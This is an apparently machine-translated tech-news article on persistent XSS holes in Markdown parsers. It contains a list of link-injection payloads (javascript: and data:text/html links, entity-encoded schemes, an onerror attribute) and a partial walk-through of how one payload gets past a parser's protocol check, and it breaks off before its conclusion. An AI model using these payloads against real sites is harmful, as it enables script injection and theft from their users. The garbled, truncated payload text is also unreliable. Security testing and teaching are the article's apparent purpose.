Shulou(Shulou.com)06/01 Report--

How to analyze Markdown parser persistent XSS loopholes, many novices are not very clear about this, in order to help you solve this problem, the following editor will explain in detail for you, people with this need can come to learn, I hope you can gain something.

What is Markdown?

Markdown is a lightweight markup language, and its popularity has been widely supported by GitHub and Stack Overflow, and we can easily use it as ordinary people.

It's great to write articles in markdown, and those trivial HTML tags can be left behind. In the last five years, markdown has received a lot of attention, and many applications, including Reddit,Github,StackOverflow, use markdown, which has also led to the emergence of a lot of markdown parsers. Some markdown syntax is defined here, and the syntax convention markdown parser parses these tags into html tags.

Markdown security status quo

What is the security status of the Markdown parser? Do you filter the data entered by the user?

In fact, many markdown parsers do not filter data entered by users, so there may be security risks if markdown is used to add functions such as user comments.

Here are some discussions on this problem: [1], [2], [3].

In addition, if you search with googe:

Markdown xss issue site:github.com

You will find that many high-level projects on github have been found to have XSS vulnerabilities.

So, how to construct some payload? Look at these:

[a] (_ javascript:prompt ([xss_clean])) [a] (_ javascript:prompt ([xss_clean]))! [a] (_ javascript:prompt ([xss_clean]))\! [a] (data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\ [a] (data:text/html) Base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) [a] (& # x6Aavascript:alert('XSS'))! [astatus039; "`onerror=prompt ([xss_clean])] (x)\ [citelol]: (_ javascript:prompt ([xss_clean])) [notmalicious] (_ javascript:_window.onerror=alert Throw% 20 [XSS _ clean]) [test] (_ javascript://%0d%0aprompt (1)) [test] (_ javascript://%0d%0aprompt (1); com)

The above payload was created by Aleksa and the original author. In the past 12 months, the above payload has been proved to be effective in actual penetration tests. And many markdown parsers are affected. Take a look at * A payload:

[test] (_ javascript://%0d%0aprompt (1); com)

We speculate that the markdown parser may parse & transform through the following steps:

It is judged that there is a protocol header? / / there is a javascript pseudo protocol, Y

Hostname ends with the common domain name suffix (com, org)? / / Yes, with com ending with Y

Convert the above payload to HTML tags. / / the result is as follows

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.